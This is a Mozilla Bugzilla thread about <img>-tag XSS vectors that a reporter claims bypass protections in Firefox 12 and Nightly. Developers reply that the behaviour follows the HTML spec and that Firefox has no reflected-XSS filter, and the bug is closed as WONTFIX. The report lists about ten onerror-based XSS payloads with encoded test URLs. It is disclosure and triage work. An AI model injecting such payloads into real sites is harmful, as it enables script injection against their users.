Closed
Bug 759682
Opened 12 years ago
Closed 3 years ago
<img> based Firefox 12 and Nightly Bypasses
Categories
(Core :: DOM: HTML Parser, defect, P5)
Tracking
()
RESOLVED
WONTFIX
People
(Reporter: justashar, Unassigned)
References
Details
User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1155.2 Safari/537.1 Steps to reproduce: I have found Firefox 12 and Firefox Nightly 15.0a1 bypasses. I have used the testing playground provided by "Masato Kinugawa" at http://vulnerabledoma.in/char_test?charset=utf-8&xss=1&body= These bypasses are not working in Chrome, Chrome Canary, IE9 and NoScript for Firefox also ables to stop these <img> tag based XSS bypasses. Actual results: Now you will find vectors along with the complete URL and innerhtml representation of the vectors. All works fine in Firefox 12 and Firefox Nightly 15.0a1. <img src= /" onerror=alert(1)> http://vulnerabledoma.in/char_test?charset=utf-8&xss=1&body=%3Cimg%20src=%20/%22%20onerror=alert%281%29%3E Innerhtml Representation of Vector: <img src="/%22" onerror="alert(1)"> ------------------------------------------------------------------------------ <img src=` onerror=alert(1)> http://vulnerabledoma.in/char_test?charset=utf-8&xss=1&body=%3Cimg%20src=%60%20onerror=alert%281%29%3E Innerhtml Representation of Vector: <img src="%60" onerror="alert(1)"> ------------------------------------------------------------------------------ <img src=x onerror=alert(1)> http://vulnerabledoma.in/char_test?charset=utf-8&xss=1&body=%3Cimg%20src=x%20onerror=alert%281%29%3E Innerhtml Representation of Vector: <img src="x" onerror="alert(1)"> ------------------------------------------------------------------------------ <img src="<img src=search"/onerror=alert(1)//"> http://vulnerabledoma.in/char_test?charset=utf-8&xss=1&body=%3Cimg%20src=%22%3Cimg%20src=search%22/onerror=alert%281%29//%22%3E Innerhtml Representation of Vector: <img src="%3Cimg%20src=search" onerror='alert(1)//"'> ------------------------------------------------------------------------------ <img src=? <img src=? onerror=alert(1)> onerror=alert(1)> http://vulnerabledoma.in/char_test?charset=utf-8&xss=1&body=%3Cimg%20src=?%20%3Cimg%20src=?%20onerror=alert%281%29%3E%20onerror=alert%281%29%3E Innerhtml Representation of Vector: <img src="?" <img="" onerror="alert(1)"> onerror=alert(1)> -------------------------------------------------------------------------------- <img/src=* onerror=alert(1)> http://vulnerabledoma.in/char_test?charset=utf-8&xss=1&body=%3Cimg/src=*%20onerror=alert%281%29%3E Innerhtml Representation of Vector: <img src="*" onerror="alert(1)"> --------------------------------------------------------------------------------- <img/src=onerror=alert(1) onerror=prompt(1)> http://vulnerabledoma.in/char_test?charset=utf-8&xss=1&body=%3Cimg/src=onerror=alert%281%29%20onerror=prompt%281%29%3E Innerhtml Representation of Vector: <img src="onerror=alert%281%29" onerror="prompt(1)"> --------------------------------------------------------------------------------- <img/src=onerror=alert(1)onerror=alert(1)" onerror=prompt(1)> http://vulnerabledoma.in/char_test?charset=utf-8&xss=1&body=%3Cimg/src=onerror=alert%281%29onerror=alert%281%29%22%20onerror=prompt%281%29%3E Innerhtml Representation of Vector: <img src="onerror=alert%281%29onerror=alert%281%29%22" onerror="prompt(1)"> --------------------------------------------------------------------------------- <img src="<img src=<img src= onerror=alert(1)>onerror=prompt(1)>" onerror=alert(1)> http://vulnerabledoma.in/char_test?charset=utf-8&xss=1&body=%3Cimg%20src=%22%3Cimg%20src=%3Cimg%20src=%20onerror=alert%281%29%3Eonerror=prompt%281%29%3E%22%20onerror=alert%281%29%3E Innerhtml Representation of Vector: <img src="%3Cimg%20src=%3Cimg%20src=%20onerror=alert%281%29%3Eonerror=prompt%281%29%3E" onerror="alert(1)"> ---------------------------------------------------------------------------------- <img src=% onerror=prompt(1)> http://vulnerabledoma.in/char_test?charset=utf-8&xss=1&body=%3Cimg%20src=%%20onerror=prompt%281%29%3E Innerhtml Representation of Vector: <img src="%" onerror="prompt(1)"> Expected results: Is it legitimate behavior of the Firefox browser? Thanks!
|
||
Updated•12 years ago
|
Component: Untriaged → HTML: Parser
Product: Firefox → Core
QA Contact: untriaged → parser
|
|
||
Comment 1•12 years ago
|
||
Not entirely sure at first glance what you're claiming is being "bypassed". If you're testing a URL-based reflected XSS filter then there's nothing to bypass because Firefox doesn't have one yet. Are we parsing things differently than the other browsers?
|
Reporter | |
Comment 2•12 years ago
|
||
Hi Daniel. I have tested all these vectors in other browsers and I am not getting alert box. I have also checked the parsing behavior of Firefox at the following URL: http://html5sec.org/innerhtml# and you will see how Firefox treats these vectors. If you think that these vectors only deals with or specific to URL-based reflected XSS filter then its ok it will then be a normal behavior of Firefox and you can close the bug accordingly. Thanks!
|
|
Reporter | |
Comment 3•12 years ago
|
||
<html>
<head>
<title>
Firefox Testing
</title>
</head>
<body>
<img/src=* onerror=alert(1)>
</body>
</html>
The above code snippet (as an example) results in an alert box & it is not URL-based test. It seems parsing error. Thanks!
|
||
Comment 4•12 years ago
|
||
> <img/src=onerror=alert(1) onerror=prompt(1)>
I spot-checked this one, and it gives me a prompt in Chrome dev, Safari, and Opera. As expected.
Same thing for this one:
<img src=? <img src=? onerror=alert(1)> onerror=alert(1)>
So what's the issue, exactly? The behavior seems to be exactly the one required by the spec. Can you actually give a specific example where Firefox's behavior differs from other browsers here?|
|
||
Comment 5•12 years ago
|
||
> The above code snippet (as an example) results in an alert box
It does that in Chrome, Safari, and Opera as well. The spec requires an alert box in that case.|
|
||
Comment 6•12 years ago
|
||
bz: I think (not sure) that he's testing not the raw HTML but the URLs below each example, and then those other browsers have features to try to stop reflected XSS. If that's the case, though, this is invalid or at best duped to the feature request that we implement such reflected XSS filtering.
|
|
Reporter | |
Comment 7•12 years ago
|
||
Ok fine. As Daniel said that there is no URL-based XSS filter in Firefox then it means that this bug has been resolved. Thanks!
|
|
||
Comment 9•12 years ago
|
||
> and then those other browsers have features to try to stop reflected XSS.
Ah, ok. Yeah, in Chrome I get things like:
Refused to execute a JavaScript script. Source code of script found within request.|
|
||
Comment 10•12 years ago
|
||
Thanks. Unfortunately we don't have that feature yet :-(
Group: core-security
|
||
Comment 11•12 years ago
|
||
(In reply to Boris Zbarsky (:bz) from comment #5) > The spec requires an > alert box in that case. If there is no parser bug here, can we resolve this as invalid or reassign to another component that's tracking the XSS filter work? What happened to the XSS filter work that was going on last summer?
|
||
Comment 12•3 years ago
|
||
Bulk-downgrade of unassigned, >=5 years untouched DOM/Storage bugs' priority and severity.
If you have reason to believe this is wrong, please write a comment and ni :jstutte.
Severity: normal → S4
Priority: -- → P5
|
|
||
Comment 13•3 years ago
|
||
XSS filtering the URL turned out not to be a great direction for browsers to take.
Status: UNCONFIRMED → RESOLVED
Closed: 3 years ago
Resolution: --- → WONTFIX
You need to log in
before you can comment on or make changes to this bug.
Description
•